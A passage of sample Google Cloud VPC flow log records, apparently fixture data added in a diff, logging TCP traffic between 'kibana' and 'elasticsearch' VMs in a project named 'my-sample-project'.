50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"67.43.156.13","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"67.43.156.13","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"67.43.156.13","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 